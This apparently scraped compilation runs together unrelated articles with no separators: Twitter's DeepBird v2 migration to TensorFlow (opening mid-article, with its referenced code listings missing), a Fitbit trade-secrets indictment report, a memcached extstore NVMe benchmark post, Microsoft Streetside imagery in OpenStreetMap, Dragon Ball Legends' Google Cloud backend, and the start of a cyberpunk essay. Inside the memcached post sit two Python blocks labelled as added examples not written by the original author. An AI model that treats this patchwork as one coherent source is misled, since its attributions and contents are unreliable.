Unlike Lua Torch, TensorFlow is here to stay. It supports HDFS out of the box, has lots of documentation and a large community. During experimentation, model metrics can be easily visualized using TensorBoard. These aspects were also strong arguments in favor of TensorFlow.

Since then, Cortex has been working to migrate DeepBird from Lua Torch to TensorFlow. We have also decided to move away from YAML, which was also used to abstract away Lua. This version 2 of DeepBird still expects most data to be stored in DataRecord format, but training scripts are now written in Python using a combination of TensorFlow and our own DeepBird extensions.

Training with DeepBird v2 at Twitter has never been simpler. Typically, any modeling workflow involves the following steps:

1) Frame the ML task: what are we optimizing, and what are the inputs and features?

2) Prepare datasets

3) Define a model suitable for the problem;

4) Write a training script to optimize a model and evaluate it on different datasets;

5) Define hyper-parameters and run the script on Aurora Mesos; and finally

6) Repeat from Steps 3 to 5 until the desired results are obtained.

v2 gives users an easy way to tune their models until they obtain the desired results. With the help of DataRecordTrainer, which encapsulates a tf.estimator.Estimator, we are able to address most of Twitter’s use cases. The trainer supports DataRecord datasets compressed in LZO format.

What is Data Record

Twitter’s data format of choice is the DataRecord. It has a long history of use for ML tasks at Twitter, and DeepBird v2 recognizes data saved in this format. Below is the Thrift struct of the DataRecord:

DataRecords were originally implemented as a way to conveniently store different combinations of sparse and dense features in a single unified struct. The format has since evolved to support more modern features like tensors and blobs.

In order to use DeepBird v2 to process DataRecords, the DataRecordTrainer can be initialized with a build_graph to specify a model. A simple binary logistic regression would look like:

The build_graph function is used in three modes: training, evaluation and prediction. These are respectively represented below:

The Trainer and Estimator APIs provide the means to configure each mode of the graph with different input_fn, metric_fn, serving_input_receiver_fn, and export_output_fn functions. The last graph is the one used in production. Like everything else at Twitter, the production models are served as microservices. The ML services implement a Prediction API which was defined years ago by the legacy ML frameworks. The Prediction API is simple. A client submits a PredictionRequest and the service replies via a PredictionResponse. Both are Thrift objects that encapsulate one or many DataRecords.

Once the model is defined, we can pass build_graph to the DataRecord API in order to train our model:

Models can be tracked through TensorBoard in order to see the desired metrics in real-time:

Additionally, models can also be tracked through our internal tool, Model Repo. Model Repo’s goal is to reduce friction in developing, deploying, maintaining, and refining models. This tool, as seen in the image below, acts in a complementary manner to TensorBoard, as it provides the ability to visualize hyperparameters and easily compare the results of multiple runs.

After the experimentation phase, the model is ready to be exported for making predictions. Typically, the exported model will later be served in a production environment. After the model has been trained and saved to disk, the DeepBird Runtime enables teams to expose it as an efficient network service compatible with the Twitter ML Thrift API.

Who uses DeepBird?

DeepBird is used by Twitter researchers, engineers, and data scientists. ML theory and technology experience varies from the beginner to expert level. Not everyone has a PhD in ML, but again, some do. Our goal is to satisfy most users on the spectrum of ML knowledge.

As discussed previously, one customer who benefits from Deep Learning models is Timelines Quality. Their main goal is to ensure the most relevant Tweets are displayed to Twitter users. Their models train on terabytes of data and make use of many training and calibration phases, including:

  • Feature Discretization;
  • Multi layer perceptron training; and
  • Isotonic Calibration of the output.

In order to support their migration to DeepBird v2, we needed to support this kind of multi-phase training. DataRecordTrainer supports this out of the box.

Before deciding to transition to v2, we analysed different model serving alternatives, including TensorFlow Serving. We decided to build our own serving system because TensorFlow Serving was not designed to interact with the Twitter stack (Mesos/Aurora/Finagle).

Caption: Aurora Mesos CPU usage graph for a DeepBird application.

The transition to v2 has involved multiple steps, including:

  • Benchmarking production servers:
    • Verifying inference correctness and measuring prediction latency using dark traffic from production services.
    • Ensuring inference service stability and efficient resource usage at high loads.
  • Matching v1 (our previous ML platform) inference and training on existing production models. The ability to load Tensors from v1 into v2 enabled us to certify the correctness of v2 components; many of our unit tests have this kind of correctness test built in.
  • Writing documentation and tutorials to help users transition to the new platform.
  • Optimizing bottlenecks like gradient descent on sparse tensors, isotonic calibration, and HDFS data loading.

The integration of v2 with our observability infrastructure has allowed us to reliably monitor our services, as shown below:

The DeepBird v2 API has moved into a stable state following a quarter spent in beta release. In this time, we have learned a lot about the intricacies of the TensorFlow Estimator API. We have invested a lot of effort in trying to use it in non-standard use cases (for example, multi-phase training). In so doing, we have been able to simplify, consolidate and expand the Estimator API into our own Trainer API.

What challenges did Cortex encounter?

The road to DeepBird v2 has not been one without its challenges. Throughout the past year, we have encountered and solved a decent amount of performance bottlenecks and other issues. Some of these challenges are outlined here:

  • Slowness in the backpropagation of sparse tensors.
  • Dataset streaming mechanism in HDFS.
  • Optimization of TensorFlow for Twitter’s internal stack.
  • Scarce documentation on implementing custom C++ OpKernels.

Ultimately, we would like to democratize v2 inside Twitter. Concretely, this means understanding and simplifying the Estimator API for engineers and data scientists, as well as ensuring a proper level of documentation, tutorials, examples and unit tests. Our goal is to make v2 simple for engineers and data scientists to understand.

Impact

We can already see the impact of using DeepBird v2 at Twitter. With it, we are able to achieve:

  • Higher engineer productivity: by using Tensorboard and internal visualization tools (e.g. Model Repo) engineers can easily observe the convergence of models and adjust them to obtain better results.
  • Easier access to ML: v2 provides, amongst many features, simplified and canned trainers, easy integration with Twitter’s technology stack, custom metrics. All of which make it easier for more engineers to experiment with ML within their teams.
  • Better inference performance: Our inference benchmarks show us that when compiled for a generic x86-64 architecture, v2 performs better than its predecessors.
  • Improvement in model metrics: The ease of use and the optimizations of v2 has already allowed for metric gains for some teams at Twitter.

This is all very exciting news for our team, and we look forward to seeing what other benefits v2 will bring to Twitter in the future.

Going forward we will continue our work on DeepBird v2. In the upcoming months, we plan to add support to enable models in this new platform to train on GPU clusters. Additionally, we are also committed to adding support to online as well as to distributed training in v2. We believe that v2 is the future of ML at Twitter.

In the long run, this should help us to expand the usage of ML inside Twitter, and provide better services to our users.

We would like to thank Kovas Boguta, and Daniel Hasegan for the early adoption of TensorFlow at Twitter. Major thanks go to the Cortex Core Environment team for initiating the analysis of alternatives, developing the design document, and integrating TensorFlow into the Twitter stack: Yi Zhuang, Conrado Miranda, Pavan Yalamanchili, Nicholas Leonard, Ricardo Cervera-Navarro, Cibele Montez Halasz, Ruhua Jiang, Priyank Jain and Briac Marcatté. Honorable mention to management for supporting us in this endeavor: Nicolas Koumchatzky, Jan Pedersen and Sandeep Pandey. And finally, a special thanks for all the Tweeps that contributed feedback during our beta offering.

Fitbit employees charged with stealing trade secrets from competitor Jawbone


SAN JOSE – Six current and former Fitbit employees were charged in a federal indictment Thursday filed in San Jose for allegedly being in possession of trade secrets stolen from competitor Jawbone, according to information from the Department of Justice.

The indictment charges the six people — Katherine Mogal, 52, of San Francisco; Rong Zhang, 45, of El Cerrito; Jing Qi Weiden, 39, of San Jose; Ana Rosario, 33, of Pacifica; Patrick Narron, 41, of Boulder Creek; and Patricio Romano, 37, of Calabasas — with violating confidentiality agreements they had signed as former employees of Jawbone after they accepted employment with Fitbit, according to an announcement from Acting U.S. Attorney Alex G. Tse and Homeland Security Investigations Special Agent in Charge Ryan L. Spradlin.

Fitbit and Jawbone are competitors in making wearable fitness trackers, and both are based in San Francisco.

Each of the defendants worked for Jawbone for at least one year between May 2011 and April 2015, and had signed a confidentiality agreement with the company, according to the Department of Justice.

Some of the defendants received offers of employment from Fitbit while they still worked at Jawbone and quickly left Jawbone to work there, while one of them accepted employment from Fitbit months after resigning from Jawbone.

“Intellectual property is the heart of innovation and economic development in Silicon Valley,” Tse said in the news release. “The theft of trade secrets violates federal law, stifles innovation, and injures the rightful owners of that intellectual property.”

If convicted, the defendants face a maximum sentence of up to 10 years imprisonment and $250,000 fine per count, followed by a maximum three years supervised release, according to the news release.

“While we live in a free market economy, HSI is committed to ensuring employees are playing fair and within the limits of the law,” said Spradlin, who is the Special Agent in Charge for northern California and northern Nevada. “HSI has devoted more than two years to investigating these allegations of the theft of trade secrets. HSI considers these types of charges extremely serious, and is dedicated to safeguarding against any illegal corporate practices adversely impacting other businesses.”


Caching Beyond RAM: The Case for NVMe


Caching beyond RAM: the case for NVMe - Dormando (June 12th, 2018)

Caching architectures at every layer of the stack embody an implicit tradeoff between performance and cost. These tradeoffs however are constantly shifting: new inflection points can emerge alongside advances in storage technology, changes in workload patterns, or fluctuations in hardware supply and demand.

In this post we explore the design ramifications of the increasing cost of RAM on caching systems. While RAM has always been expensive, DRAM prices have risen by over 50% in 2017, and high densities of RAM involve multi-socket NUMA machines, bloating power and overall costs. Concurrently, alternative storage technologies such as Flash and Optane continue to improve. They have specialized hardware interfaces, consistent performance, high density, and relatively low costs. While there is increasing economic incentive to explore offloading caching from RAM onto NVMe or NVM devices, the implications for performance are still not widely understood.

We will explore these design implications in the context of Memcached, a distributed, simple, cache-focused key/value store. For a quick overview, see the about page or the story tutorial.

  • Memcached is a RAM backed key/value cache. It acts as a large distributed hash table, with data lifetime governed by an LRU. The oldest untouched data is evicted to make room for fresh data.
  • Very low latency (sub-millisecond) and high throughput is important. Pages may request data from memcached several times, which can cause time to stack up quickly.
  • Memcached provides a huge cost reduction by cutting queries to your backend system, whether that is a database on flash/disk drives or CPU-bound code such as templating or rendering.

Memcached has a storage system called extstore, which allows keeping a portion of data for "less recently used" keys on disk, freeing up RAM. See the link for a full breakdown of how it works, but in short: keys stay in RAM, while values can be split off to disk. Recent and frequently accessed keys will still have their values in RAM.

This test was done with the help of Accelerate with Optane, which provided the hardware and guidance.

Cache RAM Breakdown


For example, a 1TB database could have only 20% of its data "active" over a given time period (say 4 hours). If you want to cache all of the active data, you might need 200G of RAM. Out of that 200G, only a fraction might be highly utilized: 10% of the RAM could be responsible for 90% of all hits to the cache, while the remaining 90% of RAM accounts for only 10% of hits.

However, if you cut that 90% of RAM, your miss rate would at least double, doubling the load on your DB. Depending on how your backend system performs, losing that RAM could double backend costs.


Breaking down items in memory, we might find that the vast majority (97.2% in the above case) live within only 30% of RAM. A smaller number of large, but still important, items take up the other 70%. Even larger items can eat RAM very quickly.

Keep in mind these larger items can be a significant percentage of network utilization. One 8k request takes the same bandwidth as 80+ small ones.


How does extstore help? By splitting the values of large, less recently used items from their keys and pointing the keys at disk, we can save a majority of less-used RAM. Depending on use case, you can:
  • Reduce overall RAM: cut 100G to 30G, or less, if you have a lot of larger items.
  • Increase hit ratio with same RAM: move large items to disk, cache longer tail of small items, increase hit ratio and reduce backend costs.
  • Reduce server count: if you have network to spare (and can handle the loss of broken servers!) you can cut the size of the cache fleet.
  • Increase overall cache: easily add hundreds of gigabytes of cache capacity per server.
  • Cache objects that used to be too expensive: create new pools with larger objects, caching precomputed data from big data stores, machine learning training data, and so on.

Are other workload variations okay? In the above example, cache hits are evenly distributed. This theoretical system has an IO limit of 400,000, which should be similar to a high end SSD or Optane drive. In this case RAM cannot be relied on to saturate the network.

At 400,000 IOPS, just 3072 byte averages are necessary to saturate a 10G NIC. 8192 for 25G. In properly designed clusters, extra headroom is necessary for growth, usage spikes, or failures within the pool. This means item sizes down to 1024 byte averages might be possible, however at 1024b (assuming 100 bytes of overhead per key), extstore will only be able to store 10x to disk of what it could fit in RAM.

Careful capacity planning is required:

  • How many lost machines can be tolerated? Each dead machine takes a percentage of the cache with it.
  • How much network bandwidth is necessary? Reducing the server count makes the network more dense.
  • How many IOPS are necessary? Most accesses are against recent data, reducing the reliance on disk.
  • What latency guarantees are necessary? If cache based disk lookups are still a lot faster than the backend
  • How long do items live for? SSDs only tolerate a certain amount of writes before wearing out.

Not everyone's workload will be compatible with external storage. Carefully evaluate how your RAM is used in your cache pools before using disk for cache. If you have exclusively small items, short TTLs, or high write rates, RAM will still be cheaper. Endurance is expressed as the drive's tolerance of "Drive Writes Per Day" (DWPD): if a 1TB device can survive 5 years with 2TB of writes per 24 hours, it has a tolerance of 2 DWPD. Optane has a high tolerance at 30 DWPD, while a high end flash drive is rated for 3-6 DWPD.
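To turn the rules of thumb above into numbers, here is an added example (not from the original post): a small planner that applies the page's three constraints, IOPS against NIC bandwidth, about 100 bytes of RAM per value kept on disk, and the drive's rated DWPD. It computes exact values, so it reports 3125 and 7812 bytes where the text rounds to 3072 and 8192; the per-item overhead and the headroom fraction are assumptions, and write amplification from extstore page compaction is not modelled and would raise the projected DWPD.

```python
"""Capacity planning arithmetic for moving memcached values to extstore.

Added example, not from the original post.  The constants are the rules
of thumb the post gives; compaction write amplification is ignored.
"""
from typing import Dict

KEY_OVERHEAD_BYTES = 100        # key + metadata kept in RAM per value on disk (assumed)
SECONDS_PER_DAY = 86_400


def nic_saturating_item_size(iops: int, nic_gbit: float) -> int:
    """Average value size (bytes) at which `iops` reads fill a NIC of nic_gbit Gbit/s."""
    return int(nic_gbit * 1e9 / 8 / iops)


def ram_for_disk(disk_bytes: int, avg_item_bytes: int,
                 key_overhead: int = KEY_OVERHEAD_BYTES) -> int:
    """RAM needed to index `disk_bytes` of values of the given average size."""
    return (disk_bytes // avg_item_bytes) * key_overhead


def projected_dwpd(device_bytes: int, sets_per_second: float,
                   avg_item_bytes: int) -> float:
    """Drive writes per day generated by a steady stream of sets."""
    bytes_per_day = sets_per_second * SECONDS_PER_DAY * avg_item_bytes
    return bytes_per_day / device_bytes


def plan(iops: int, nic_gbit: float, avg_item_bytes: int, disk_bytes: int,
         sets_per_second: float, rated_dwpd: float,
         headroom: float = 0.5) -> Dict[str, object]:
    """Summarise whether a pool is network, RAM or endurance bound.

    `headroom` is the fraction of the IOPS ceiling held back for growth,
    usage spikes and failed peers, as the post recommends.
    """
    usable_iops = int(iops * (1 - headroom))
    saturating = nic_saturating_item_size(usable_iops, nic_gbit)
    dwpd = projected_dwpd(disk_bytes, sets_per_second, avg_item_bytes)
    return {
        "nic_saturating_item_bytes": saturating,
        "nic_bound": avg_item_bytes >= saturating,
        "disk_to_ram_ratio": avg_item_bytes / KEY_OVERHEAD_BYTES,
        "ram_bytes_for_index": ram_for_disk(disk_bytes, avg_item_bytes),
        "projected_dwpd": dwpd,
        "endurance_ok": dwpd <= rated_dwpd,
    }


if __name__ == "__main__":
    # 400k IOPS device, 10G NIC, 1 KiB values, 375G Optane, 20k sets/s, 30 DWPD rating
    for k, v in plan(400_000, 10, 1024, 375 * 10**9, 20_000, 30).items():
        print(f"{k:>26}: {v}")
```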

Test Setup

The tests were done on an Intel Xeon machine, sporting 32 cores, 192G of RAM, a 4TB SSD, and 3x optane 750G drives. Only one optane drive was used during the test. As of this writing extstore only works with one drive, and this configuration reflects most of its users.

  • mc-crusher was used to run the tests. Specifically, the third tag, containing the test-optane script.
  • mc-crusher is designed primarily to run as fast as possible: it does not parse responses, stacks as many queries as it can per syscall, and makes no attempt to time anything. In this test it was run against localhost, though it never used more than a single core of CPU.
  • The test-optane script describes the exact configurations used in the test. Memcached was configured to use 32 worker threads (the machine has 32 physical cores, 64 with hyperthreading).
  • The "balloon" program from mc-crusher was used to take up 125G of RAM, and 100 million keys loaded into memcached, to avoid extstore simply using the buffer pool.
During each test run, the number of mc-crusher clients was varied, as well as the number of extstore IO threads in the server. Too few IO threads won't saturate the device, and too many will overload it and can cause queues.

Each test runs for a minute after warm-up.

Latency and Throughput measurements

Since mc-crusher does not time results, two scripts were used to generate the result data:

  • bench-sample: Periodically runs the "stats" command against memcached, using its counters to determine average throughput. The data is sampled every few seconds, and was inspected for significant standard deviation.
  • latency-sample: A script which pretends to be a blocking memcached client and "samples" requests over time, at the same time bench-sample is running. This is used to avoid traps like "95th percentile", which removes outliers or grouping, causing misleading results.
For every test, a full breakdown of the latency samples are provided. The sampling was done at a maximum rate of one per millisecond.
Note: an event loop is not used, to avoid having to determine time elapsed as time waiting to be processed if a stack of events happen at the same time.

The Tests

Three general tests were done:

  • ASCII multiget: this mode allows extstore to use the fewest packets to generate a response, as well as heavily pipeline requests internally. Lower latency devices can reach higher throughputs more easily with this test.
  • Pipelined gets: many get requests are stacked into the same packet, but extstore has to service each request independently. In these tests, extstore was easily able to saturate the OS's ability to serve buffered IO (kswapd kernel threads were maxed out), but the latency graphs show Optane keeping latency at roughly a tenth of the flash drive's.
    • At higher client loads, pipelined gets may look odd: that will need further research, but is likely caused by queuing internally. Since mc-crusher is very aggressive, the optane drive is able to saturate the system with much fewer IO threads and crusher clients. In production workloads optane will provide much more consistent low latency service.
  • Multiget + pipelined sets: the previous two workloads were read-only. In this test, sets are also done against memcached at a rate of roughly 1/3rd to 1/5th. Extstore is flushing to the drive at the same time as reads are happening. Again, optane comes out strong.

The Results

Unfortunately there is some wobbling in the graphs; that is due to leaving too little RAM free during the tests. The Optane's performance was consistent, while the OS struggled to keep up.

For reference: a pure RAM multiget load test against this exact configuration of memcached (32 threads, etc.) results in 18 million keys per second. More contrived benchmarks have gotten a server with many cores up past 50 million keys per second.

With few extstore IO threads the Optane drive is able to come much closer to saturating the IO limit: 4 threads, 4 clients: 230k Optane, 40k SSD. The latency breakdown shows the SSD typically being an order of magnitude higher in wait time, with the Optane staying in the 10us bucket, and SSD in 100us, slipping into 1ms.

With many extstore IO threads the underlying OS becomes saturated, causing wobbles and queueing in the Optane graph. Meanwhile, the SSD continues to benefit from extra thread resources, needed to overcome the extra latency from flash.

For many workloads, both SSD and Optane are completely viable. If a bulk of reads still come from RAM, with extstore used to service the long tail of only large objects, they both keep requests under 1ms in response time.

If you want to push the boundaries of extstore a drive like Optane goes a long way:

  • High write tolerance goes well with cache workloads
  • Very low latency helps smooth over the tradeoff of requesting cache data from disk
  • Small size is currently advantageous: extstore requires RAM for every value on disk. 375G to 1TB of disk requires a lot less RAM in a particular machine, and 2TB+ is probably too dense to allow safe failover or avoid NIC saturation.

Learnings

  • The extstore flusher is a background thread combined with the code which manages the LRUs. During a benchmark, sets are consistently sent to the server, which can starve extstore's flushing. In production, insert rates to memcached tend to come in waves, even as short as a millisecond across, so it can keep up. Performance will be more consistent once the flusher runs as its own thread.
  • Latency sampling is tough. The current script provides useful data, but a much better program would pace one request every millisecond onto a pool of blocking threads, allowing us to determine if the server is pausing or if some requests are simply slow. Full timing of every sample can also be saved and graphed. This would visualize clustering of responses which can come from the underlying OS or drive.
  • Buffered I/O has limitations. This was known ahead of time: most workloads are in the order of hundreds of thousands of operations per second or much less, and most of those will be against RAM and not extstore. We've focused on stability for the time being, but eventually direct IO and async IO will be able to better utilize the devices under high load.
  • Extstore's bucketing could allow for a very interesting mix of Optane along with traditional flash. Internally, extstore organizes data into "pages" of disk space (typically 64M). New items are clustered into particular pages. Items with short TTLs can be clustered together. Items which survive page compaction are clustered as well, which reduces the need for compaction over time. All new items and/or short TTL items could rest on a 375G Optane drive, while compacted items could sit on a 1TB flash drive, providing even greater cost savings.

Conclusions

Workloads which aren't currently possible due to cost are now possible. Most workloads containing mixed data sizes and large pools can have significant cost reduction.


Extstore requires RAM per item on disk. This chart, assuming 100 bytes of overhead per item (key + metadata), visualizes how the RAM overhead falls as item sizes get larger.
DRAM costs are 3-4x Optane, and 4-8x SSD, depending on the drive.
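As an added illustration of the page bucketing described under Learnings and the per-item RAM overhead above (example code written for this page, not memcached's extstore code; the bucket-to-device mapping, the 64M page size and the 100-byte overhead are assumptions taken from the post's description):

```python
"""Toy model of extstore-style page bucketing across a fast and a large drive.

Constructed illustration, not memcached's extstore. New and short-TTL items are
appended to pages placed on the small, fast drive; items that survive page
compaction are rewritten into pages placed on the larger flash drive. The
in-memory index costs a fixed amount of RAM per value held on disk.
"""
from dataclasses import dataclass, field
from typing import Dict, List

PAGE_SIZE = 64 * 1024 * 1024   # extstore's typical 64M page, per the post
RAM_OVERHEAD_PER_ITEM = 100    # post's assumption: key + metadata per item on disk

# Assumed bucket-to-device mapping for the mixed Optane/flash layout the post
# sketches; extstore has no such option, this is only the illustration.
BUCKET_DEVICE = {"default": "optane", "short_ttl": "optane", "compacted": "flash"}


@dataclass
class Item:
    key: str
    size: int
    ttl: int            # seconds; 0 means no expiry
    live: bool = True   # False once deleted or overwritten (dead space on its page)


@dataclass
class Page:
    bucket: str
    device: str
    items: List[Item] = field(default_factory=list)
    used: int = 0       # bytes appended, including dead items until compaction

    def fits(self, size: int) -> bool:
        return self.used + size <= PAGE_SIZE

    def dead_fraction(self) -> float:
        dead = sum(i.size for i in self.items if not i.live)
        return dead / self.used if self.used else 0.0


class BucketedStore:
    def __init__(self, short_ttl_threshold: int = 3600):
        self.short_ttl = short_ttl_threshold
        self.pages: List[Page] = []
        self.open: Dict[str, Page] = {}      # page currently appended to, per bucket
        self.index: Dict[str, Item] = {}     # stand-in for the RAM-resident index

    def _append(self, bucket: str, item: Item) -> Page:
        page = self.open.get(bucket)
        if page is None or not page.fits(item.size):
            page = Page(bucket, BUCKET_DEVICE[bucket])
            self.pages.append(page)
            self.open[bucket] = page
        page.items.append(item)
        page.used += item.size
        return page

    def put(self, key: str, size: int, ttl: int = 0) -> str:
        """Store a value; returns the device its page lives on."""
        if key in self.index:
            self.index[key].live = False      # old copy becomes dead space
        item = Item(key, size, ttl)
        self.index[key] = item
        bucket = "short_ttl" if 0 < ttl <= self.short_ttl else "default"
        return self._append(bucket, item).device

    def delete(self, key: str) -> None:
        item = self.index.pop(key, None)
        if item:
            item.live = False

    def compact(self, min_dead_fraction: float = 0.5) -> int:
        """Rewrite pages whose dead fraction reaches the threshold.

        Survivors are re-appended into the 'compacted' bucket (flash in this
        model) and the old page is freed. Returns the number of pages compacted.
        """
        victims = [p for p in self.pages if p.dead_fraction() >= min_dead_fraction]
        for page in victims:
            self.pages.remove(page)
            if self.open.get(page.bucket) is page:
                del self.open[page.bucket]
            for item in page.items:
                if item.live:
                    self._append("compacted", item)
        return len(victims)

    def live_bytes(self, device: str) -> int:
        return sum(i.size for p in self.pages if p.device == device
                   for i in p.items if i.live)

    def ram_overhead(self) -> int:
        """RAM the index costs for the values currently held on disk."""
        return len(self.index) * RAM_OVERHEAD_PER_ITEM

    def ram_to_disk_ratio(self) -> float:
        """Falls as average item size grows, which is the post's chart in one number."""
        disk = sum(i.size for i in self.index.values())
        return self.ram_overhead() / disk if disk else 0.0
```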

As cache shifts from RAM to Optane (or flash), money spent purely on RAM can drop to 1/3rd.

Reducing RAM also reduces reliance on multi-socket servers: to get very high RAM density, NUMA-capable machines are often necessary. These have multiple sockets and multiple CPUs, with half of the RAM attached to each CPU. Since memcached is highly efficient, once RAM is reduced you can cut not only the RAM but also half of the motherboard/CPU and even power costs. Cost reductions up to 80% for specific workloads are reasonable.

High speed, low latency SSD opens a new era for database and cache design. We demonstrate high performance numbers for a wide variety of use cases, for both reduction of costs and expansion of cache usage.

Microsoft contributed 5PB street view data to OpenStreetMap


Microsoft has a long history of working with the community to help improve OpenStreetMap. This includes being the first company to provide aerial imagery to the community for editing and, more recently, our release of almost ten million building footprints. We continue to have an interest in fostering a thriving and growing community of both contributors and users of OpenStreetMap.

This week Microsoft is integrating its Streetside imagery for the United States into iD, a popular web-based editor for contributing to OpenStreetMap. This is the same imagery currently visible on Bing Maps now embedded into a popular editing application initially developed and now maintained by Mapbox. Our aim is that it continues to encourage the community to contribute and improve OpenStreetMap.

The Streetside imagery covers more than 80% of the US population with 360 degree views. The massive imagery dataset covers approximately 1.6 million kilometers and takes nearly 5PB of storage! This imagery when viewed in conjunction with Bing imagery along with existing data in OpenStreetMap represents a significant increase in verifiable ground truth for OpenStreetMap contributors.

Bing Maps Streetside Imagery integrated in OpenStreetMap Editor iD
- Bing Maps Team

Behind the Scenes with the Dragon Ball Legends GCP Back End


Based on their anticipated demand, BNE had three ambitious requirements for their game:
  1. Extreme scalability. The game would be launched globally, so it needed a backend that could scale with millions of players and still perform well.
  2. Global network. Because the game allows real-time player versus player battles, it needs a reliable and low-latency network across regions.
  3. Real-time data analytics. The game is designed to evolve with players in real-time, so it was critical to have a data analytics pipeline to stream data to a data warehouse. Then the operation team can measure and evaluate how people are playing the game and adjust it on-the-fly.
All three of these are areas where we have a lot of experience. Google has multiple global services with more than a billion users, and we use the data those services generate to improve them over time. And because Google Cloud Platform (GCP) runs on the same infrastructure as these Google services, GCP customers can take advantage of the same enabling technologies.

Let’s take a look at how BNE worked with Google Cloud to build the infrastructure for Dragon Ball Legends.

Challenge #1: Extreme scalability

MySQL is extensively used by gaming companies in Japan because engineers are used to working with relational databases with schema, SQL queries and strong consistency. This simplifies a lot on the application side, which doesn’t have to handle any database limitations like eventual consistency or schema enforcement. MySQL is widely used even outside gaming, and most backend engineers already have strong experience using this database.

While MySQL offers many advantages, it has one big limitation: scalability. Indeed, as a scale-up database, if you want to increase MySQL performance, you need to add more CPU, RAM or disk. And when a single instance of MySQL can’t handle the load anymore, you can divide the load by sharding—splitting users into groups and assigning them to multiple independent instances of MySQL. Sharding has a number of drawbacks, however. Most gaming developers calculate the number of shards they’ll need for the database before the game launches, since resharding is labor-intensive and error-prone. That leads gaming companies to overprovision the database so it can eventually handle more players than they expect. If the game is as popular as expected, everything is fine. But what if the game is a runaway hit and exceeds the anticipated demand? And what about the long tail representing a gradual decrease in active players? What if it’s an out-and-out flop? MySQL sharding is not dynamically scalable, and adjusting its size requires maintenance as well as risk.

In an ideal world, databases can scale in and out without downtime while offering the advantages of a relational database. When we first heard that BNE was considering MySQL sharding to handle the massive anticipated traffic for Dragon Ball Legends, we suggested they consider Cloud Spanner instead.

Why Cloud Spanner?

Cloud Spanner is a fully managed relational database that offers horizontal scalability and high availability while keeping strong consistency with a schema that is similar to MySQL’s. Better yet, as a managed service, it’s looked after by Google SREs, removing database maintenance and minimizing the risk of downtime. We thought Cloud Spanner would be able to help BNE make their game global.


Evaluation to implementation

Before adopting a new technology, engineers should always test it to confirm its expected performance in a real world scenario. Before replacing MySQL, BNE created a new Cloud Spanner instance in GCP, including a few tables with a similar schema to what they used in MySQL. Since their backend developers were writing in Scala, they chose the Java client library for Cloud Spanner and wrote some sample code to load-test Cloud Spanner and see if it could keep up with their queries per second (QPS) requirements for writes—around 30,000 QPS at peak. Working with our customer engineer and the Cloud Spanner engineering team, they met this goal easily. They even developed their own DML (Data Manipulation Language) wrapper to write SQL commands like INSERT, UPDATE and DELETE.

Game release

With the proof of concept behind them, they could start their implementation. Based on the expected daily active users (DAU), BNE calculated how many Cloud Spanner nodes they needed—enough for the 3 million pre-registered players they were expecting. To prepare the release, they organized two closed beta tests to validate their backend, and didn’t have a single issue with the database! In the end, over 3 million participants worldwide pre-registered for Dragon Ball Legends, and even with this huge number, the official game release went flawlessly.

Long story short, BNE can focus on improving the game rather than spending time operating their databases.


Challenge #2: Global network

Let’s now talk about BNE’s second challenge: building a global real-time player-vs-player (PvP) game. BNE’s goal for Dragon Ball Legends was to let all its players play against one another, anywhere in the world. If you know anything about networking, you understand the challenge around latency. Round-trip time (RTT) between Tokyo and San Francisco, for example, is on average around 100 ms. To address that, they decided to divide every game second into 250 ms intervals. So while the game looks like it’s real-time to users, it’s actually a really fast turn-based game at its core (you can read more about the architecture here). And while some might say that 250ms offers plenty of room for latency, it’s extremely hard to predict the latency when communicating across the Internet.

Why Cloud Networking?

Here’s what it looks like for a game client to access the game server on GCP over the internet. Since the number of hops can vary every time, playing PvP can sometimes feel fast, sometimes slow.

One of the main reasons BNE decided to use GCP for the Dragon Ball Legends backend was the Google dedicated network. As you can see in the picture below, when using GCP, once the game client reaches one of the hundreds of GCP Points of Presence (POPs) around the world, it’s on the Google dedicated network. That means no unpredictable hops, for predictable and the lowest possible latency.


Taking advantage of the Google Cloud Network

Usually, gaming companies implement PvP by connecting two players directly or through a dedicated game server. Combat games that require low latency between players will usually prefer P2P communication. In general, when two players are geographically close, P2P works very well, but it’s often unreliable when trying to communicate across regions (some carriers even block P2P protocols). For two players from two different continents to communicate through Google’s dedicated network, players first try to communicate through P2P, and if that fails, they fail over to an open source implementation of a STUN/TURN server called coturn, which acts as a relay between the two players. That way, cross-continent battles leverage the low-latency and reliable Google network as much as possible.


Challenge #3: Real-time data analytics

BNE’s last challenge was around real-time data analytics. BNE wanted to offer the best user experience to their fans, and one of the ways to do that is through live game operations, or LiveOps, in which operators make constant changes to the game so it always feels fresh. But to understand players’ needs, they needed data, usually users’ action log data. And if they could get this data in near real-time, they could then make decisions on what changes to apply to the game to increase users’ satisfaction and engagement.

To gather this data, BNE used a combination of Cloud Pub/Sub and Cloud Dataflow to transform users’ data in real-time and insert it into BigQuery.

  • Cloud Pub/Sub offers a globally reliable messaging system that buffers the logs until they can be handled by Cloud Dataflow.
  • Cloud Dataflow is a fully managed parallel processing service that lets you execute ETL in real-time and in parallel.
  • BigQuery is the fully managed data warehouse where all the game logs are stored. Since BigQuery offers petabyte-scale storage, scaling was not a concern. Thanks to heavy parallel processing when querying the logs, BNE can get a response to a query, scanning terabytes of data in a few seconds.
This system lets a game producer visualize a player’s behavior in near real-time and make decisions on what new features to bring to the game or what to change inside the game to satisfy all their fans.


Takeaways

Using Cloud Spanner, BNE could focus on developing an amazing game instead of spending time on database capacity planning and scaling. Operations-wise, by using a fully managed scalable database, they drastically reduced risks related to human error as well as operational overhead.

Using Cloud Networking, they leveraged Google’s dedicated network to offer the best user experience to their fans, even when fighting across regions.

And finally, using Google’s analytics stack (Cloud PubSub, Cloud Dataflow and BigQuery), BNE was able to analyze players’ behaviors in near real-time and make decisions about how to adjust the game to make their fans even happier!

If you want to hear more details about how they evaluated and adopted Cloud Spanner for their game, please join them at their Google Cloud NEXT’18 session in San Francisco.

The Cyberpunk Sensibility (2016)


“Cyberpunk creeps up on us. Some kind of alchemy transforms its fictions into truths, and draws us towards places we thought unreal.”
(@uttunul)

Conventionally speaking, cyberpunk is a media genre. It brings to mind William Gibson’s Neuromancer. You fondly remember Blade Runner, and maybe Deus Ex or Ghost in the Shell. The phrase “high tech, low life” floats up from the back of your brain. You picture an exaggerated version of Hong Kong with a heavy dose of Rio de Janeiro’s favelas. You’re envisioning the Walled City of Kowloon plus lots of computers. Within tiny apartments, disheveled vigilante hackers stare at their screens, busily infiltrating the databases of megacorps.


Illustration by Grace Witherell

